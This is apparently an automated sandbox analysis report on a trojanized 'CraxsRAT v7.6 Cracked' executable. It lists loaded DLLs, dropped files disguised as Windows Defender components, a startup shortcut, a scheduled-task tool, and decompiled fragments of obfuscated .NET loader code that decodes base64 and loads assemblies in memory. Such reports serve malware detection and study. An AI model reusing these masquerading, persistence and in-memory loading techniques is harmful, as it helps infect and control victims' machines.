Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32

Jump to behavior

Source: Windows Defender Notification.lnk.10.dr

LNK file: ..\..\..\..\..\Windows Defender Notification.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: CraxsRAT v7.6 Cracked.exe

Static file information: File size 89198592 > 1048576

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5507000

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.NBX8pyB6D1KtT7wuPVqHEBUua44mcQ5RKbZLjcd49sXZN1av4ROWjx6rGTaiFD1b1F4r7DFEZI78UN3qmKP,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.J8RZNwWq4rG8iscgmRyWEjOP42wZiYt90vKSSGSpfev6LGwro890ZBh9Ffsu0qYFi9PRvp0WwQ1wOURg05q,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.rxQJJqtKmPXhjiux4vt2fRyYMqYq4QzxkejWBUiQAQPd45Wv7EDidwPuvHEx7EIs1GIarcDk1ASAJNdxW6P,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.QBSa0yh9tK0ZxGq551kzWifMvsrHUBAzVONPluFc2vksdnBRDmMuA712W6MT4bDKrOZAc9IvpF77Fd6NhDn,wBRYVJsNSz.rwhwYlQjYm()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[2],wBRYVJsNSz.JvLjNAOTTk(Convert.FromBase64String(FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.NBX8pyB6D1KtT7wuPVqHEBUua44mcQ5RKbZLjcd49sXZN1av4ROWjx6rGTaiFD1b1F4r7DFEZI78UN3qmKP,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.J8RZNwWq4rG8iscgmRyWEjOP42wZiYt90vKSSGSpfev6LGwro890ZBh9Ffsu0qYFi9PRvp0WwQ1wOURg05q,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.rxQJJqtKmPXhjiux4vt2fRyYMqYq4QzxkejWBUiQAQPd45Wv7EDidwPuvHEx7EIs1GIarcDk1ASAJNdxW6P,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.QBSa0yh9tK0ZxGq551kzWifMvsrHUBAzVONPluFc2vksdnBRDmMuA712W6MT4bDKrOZAc9IvpF77Fd6NhDn,wBRYVJsNSz.rwhwYlQjYm()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[2],wBRYVJsNSz.JvLjNAOTTk(Convert.FromBase64String(FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.NBX8pyB6D1KtT7wuPVqHEBUua44mcQ5RKbZLjcd49sXZN1av4ROWjx6rGTaiFD1b1F4r7DFEZI78UN3qmKP,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.J8RZNwWq4rG8iscgmRyWEjOP42wZiYt90vKSSGSpfev6LGwro890ZBh9Ffsu0qYFi9PRvp0WwQ1wOURg05q,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.rxQJJqtKmPXhjiux4vt2fRyYMqYq4QzxkejWBUiQAQPd45Wv7EDidwPuvHEx7EIs1GIarcDk1ASAJNdxW6P,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.QBSa0yh9tK0ZxGq551kzWifMvsrHUBAzVONPluFc2vksdnBRDmMuA712W6MT4bDKrOZAc9IvpF77Fd6NhDn,wBRYVJsNSz.rwhwYlQjYm()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[2],wBRYVJsNSz.JvLjNAOTTk(Convert.FromBase64String(FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7 System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj
Source: Windows Defender Real Time Protection.exe.0.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7 System.AppDomain.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj System.AppDomain.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj
Source: 0e75fed00639ea9e725255499292dcdd.exe.2.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7 System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj

Binary contains a suspicious time stamp

Source: CraxsRat.exe.0.dr

Static PE information: 0xF9BEEE5F [Wed Oct 11 19:54:07 2102 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F200BD pushad ; iretd	10_2_00007FF848F200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF848E1D2A5 pushad ; iretd	16_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF848F3B238 push esp; retf 4810h	16_2_00007FF848F3B2A7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF848F3B9FA push E85A9AD7h; ret	16_2_00007FF848F3BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF849002316 push 8B485F92h; iretd	16_2_00007FF84900231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FF848E2D2A5 pushad ; iretd	19_2_00007FF848E2D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FF848F4120A push E95BD305h; ret	19_2_00007FF848F41239
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FF848F419DB pushad ; ret	19_2_00007FF848F419E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FF849012316 push 8B485F91h; iretd	19_2_00007FF84901231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF848E2D2A5 pushad ; iretd	21_2_00007FF848E2D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF848F4BA7D push E85A99D7h; ret	21_2_00007FF848F4BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF849012316 push 8B485F91h; iretd	21_2_00007FF84901231B
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Code function: 27_2_00007FF848F200BD pushad ; iretd	27_2_00007FF848F200C1

Source: Windows Defender Notification.exe.0.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	High entropy of concatenated method names: 'eFH2FmaJK5LUeKre09eLwsIjBu7PnAtmMTq8Vnl5d3s2bB3S7huedqJPoFEliTJ5IrWJMYaNpYjQFjSmozuWUD', '_4o2S3m4KVeiqQQ6kUSEXIthvHdYaVzhZcn0DalEllLssYTUFOASu1DewjUZ2H7FDLrZa7OF61yItSiYPbK9R8P', '_631JxyaTMNv4HZIY1so780lB5HTSRvLcD2fJIUcAWHLIGq37nySOMFa7vHFxgJQWL1N1ve21FUh7o8SNAHW7HI', 'bejFLzsMpoSCN2v5D7yaVeFVjIar9IKlSxJz1H6bk9TngTM1Mfpdgl4csHEYH1X9lKQPEB3sAFsnaFN8HlEcn2'
Source: Windows Defender Notification.exe.0.dr, v9OXbFpunZ.cs	High entropy of concatenated method names: 'HxXFfSw7hf', '_1C7vW2mY92', '_24zYi7EpgZ', 'TaY9sEdH4toPP7MHxMjvaAg7XJhnJALZEIE115cIf7lNg5UytZQmWAmgqnjw', 'zRCCAVNfHi2CMlqbExJ1GRdyBxzjBwJeQKTI31DatDX8Ggn524vi7i7Yrevi', '_47rQ23Ejjos3S4pRadMA5yPTHqTyjbliPO9EE4Gwv1pNpMoAhxD9Csq9E5J6', 'cRIhK73inV4njdFllvnlQOs92otehjuJNv3gRNA8kR0UXGMPLmIAyGq4wson', 'Bi2UDHgHU8vFDzifjKYM1dJmqTBJnZdWQlm1JzejRdZzzhEMhLZJbVUIQR9j', '_3qtr5oq2B1obDRNzs4DEnO6kHRKDPE8YLmKUAjwwwGMamVDL3I60yyvhO9vC', 'CpkKRHSkQb374EOiWHbmJs028FABbGY5IDHiVMBXV5NFMo8PO2TRTZHYGM0y'
Source: Windows Defender Notification.exe.0.dr, UzZMpgChwRaT8zNgaVCoesKDS3scFXjZncCD69l6zb8jbqdVau.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rOpALqUFgE6thMm99MqbNIk1FdUdenflx1D0w3yqy4D8NYuO1PhXgxL6dfR91CfVxt0Z1ndDetkSPEGN9g3psK', 'xsZtL7CEKzM2jRdbT3mp0GEWML6Dp8gLJ6xconkV4OUVFwEMNiQB4kpJFPvDY8ATX84ZhlZCUKnVAJc1LVMfRC', '_1s1XrrBc1xpEdP7qKhITUNNiVguqMP5r1i1glKCvWj4NkI2mqqK192MGsFGXtjIvKehwKDwlspl0VOMsKoZRvZ', 'Wq5R5PjAfU1s4ZU7nYGRE5hdfDT03hysXA21YjM80U9NAt1Z7YEvhY9807Amhn5drh8lmpLzTYjah5AGS5Xjn9'
Source: Windows Defender Notification.exe.0.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	High entropy of concatenated method names: 'K3Dz63yLxdsjAtVozCvdXZr1rO788cMOQ1DvHOBY6q3fGhwhEBbZUjy6xfNf4aoHMLT2soHxXJWM9KjJwnX', 'Va2411o4GCAmLbiuT0KzKl9lyaZKRKvJTbnh1n5ICUSnN1y8OOrWQQ4KVHfwd1eCrtDXaVUn6akOxqme6Z9', 'cmKbkP9KFPm1vGlCs0HIMQp8AjRMozCK0hpsr6V3WjvsxdkNIk8iDiaI0gdkRsbdYkBgKQAkNYsOg9j8ovS', '_1nvgUtfpHaKsEVsrXBD5G2NV7axWKdpNi5tUQezreWWkcXauUbDKAFVEGjVI3Ed18Q0BBWbYYSqbVfeldKA', 'enLg1lTPCEGKAFakWf2ywahMfeffcWUNwhipT2iVuyHo5125c512455ZOrvBS1TVFemsfzbdaPBtW1D8ong', '_8vsfzdI2FJL44qzKITe5pDyOf2hcE54ZRxYEd1xofHNDDcSOAgpjCCvgHAUGePBlkP7oqwOzGbPIi4Vlwp9', 'DCHHDB6au7qzi8KhxLBBuzRSiiXfatXtKrmhOfM5lNpEw5PaDKtfm7PdCjSLQtqRuXgO2Bu2awKhqC03nfs', 'kutrzKb2sgrWZ8bkw80oBmlsqjf2P0botSprxItQlmhdweNofpr0P9ocBgH1arSSXY01xbQwDizJ7bKrXCh', 'PokwU0jcKWI57otPxsXapISPcRBm7JUSI3ZUIUjDHkvTtFOPxzkEd8t3muZUnW4Xcn8krUA0aRdVe3SkSI5', 'bzEVWbCL38A4IS1BidLSxM1pUQ5yMDJFSRZ2bYsRcwxkCs0kSxfnaecPsoD5KLFWFmf6K1DIyDSd0eejsv0'
Source: Windows Defender Notification.exe.0.dr, uHTIy6r9l8km7RHF3R1gfhVQFZLgQlJXzGfqtMdXzQRoxoN4usUdovyvRErvCLDIiShN.cs	High entropy of concatenated method names: 'vV65D7AFcrfiS50zK4IBGgyjYJ5i7StSvWsvN52QcbUgramkIY8SEJ9RVOphtYaUK4a4', 'udT2QdaNbpH6yv6jw3gBHulqhB7AhFCNmjYchTp29WvcMqTddp9ygihKTKJzuzWdVekZ', 'W0SF6mJhhm', 'BLQYxx6xnM', 'TeJU2gNBVZ', 'pcV5RL4ho8', 'HMhRAqMOO9', 'AzNPgMSgYH', 'zdnlW7asch', 'roBeiESt2f'
Source: Windows Defender Notification.exe.0.dr, dRbRSlfClq9FzBPNcL355veDxzfFx2QIWnrggUkAAxxka4xjh2nGbpV0jwsb2c174JFuYrelADjFIWxDIRp.cs	High entropy of concatenated method names: 'IRSmar0xXVR4UsJJOtVS3Nufgkl4S9oBQtSlQH2llsuNCYdPsN5Rk9ChpbTyFZGNq5uopS7ie3AiC5oY55l', 't9AfThoo7nMHFnR9tltANM4dKWhNxOFrL231jEj9z6Trma7K4h320tNpSHOe8Y70vyPC3pw0TbCNnAdljZW', 'CSllT1stUEH8bCYwTOBEwClyf7OOxkSgbTEtsLpHvmyVbY3ESy4rplbw3Z3W6paDw9t1CII3RKFCVzaJlFp', 'fxDsWtErS2WPg9n04qvh2tkGp5o9ZPC4LtwgUo8Nx5znyg5JwzergO4eNjY1QuMXk9gysfB8Me5aMrRbE1E', 'lxYGtK7oKCgdMuJmmsvdXi3aI7cKBLPXJDHVvdHji3xNJNO3ctjnlzlIO5mqtfA2SVgdhXHbUA8Zx5U4gy9', '_4mZ9QyfPaIZknqStmooj0ZSdf7sqTfpmY2TmJkgDzPSpIanAMc7kid8oT863AMhRyDiDWAonKFLPYmL5UZ8GMR', 'TOCbSj7ueBUbtKWNp97R2YAquZTw8vdKD92eb4ptZNTfXALR3pzZ1tVAdr07IOWudqqBtNrTVtTJYpjn2NvTFq', '_128ooaK8Ay1av0suWHrIubhLdQHfmfm2NQgKwnBT3JPSgSAMik3d1Ka1t9V7BJIRmuCRrg07F5x0nBgNmFMtH8', 'LEBTuCdV6B8HkfMEyGZut5l1TVxGjzdRGSvae4nNbbekcXYtgZBgy7kaTmHOBcMe4UD5y0QL2pY7tjCGdQV3vB', 'jKjZnQSJjkvPqSU17baZXt8aTfM2x0so13eMeCTUukFoo0vGrAszbeXi75jNPk2ckzKPRdK3VDYgoodu89tZgw'
Source: Windows Defender Notification.exe.0.dr, 8H0hdeBXNmvFjH8LejVEK2sRsxtRvHpaEUv4gz0XOQuxjnFHEDOH5YGig1PH9L3jiaNH.cs	High entropy of concatenated method names: 'rGbeiPz0OChV2j5nw5PShma3VuRlCxGb5FUWgGSDAED34Cnduq5uxHtnfG7MtQgPTkVD', 'eqKQ6MVA5zxAyBxgYUz4wX3Pmlry', 'RAiYehoOKsoox4y4R6OC7Ldrw6UP', '_3s78StkDqmLED63R5qLD8vyz4Gil', 'wgHLuou176s3KG7W43NoDROZVCuN'
Source: Windows Defender Notification.exe.0.dr, uUAcd1V7wC.cs	High entropy of concatenated method names: '_2S8IlRDS09', 'pjqDgiSIDQ', 'WfS6mBpWvh', 'EzwAFhJ8Xy', 'uYJ5UByWqFyVV21VK9xlXftX1LCG', 'bVQ9TJkJuS68ADrYqkdW8orrqzgw', 'jldwlwr4duUoiBr5eJ0penUR6YwT', 'V3PW2WaGywFVERzBd0R6lLTfyb8r', 'y9N3yYM2HxQHXXmdBQ2Q9hZcyM89', 'NjWV4Tw0G6mVriKH3MkCEE3tdjNQ'
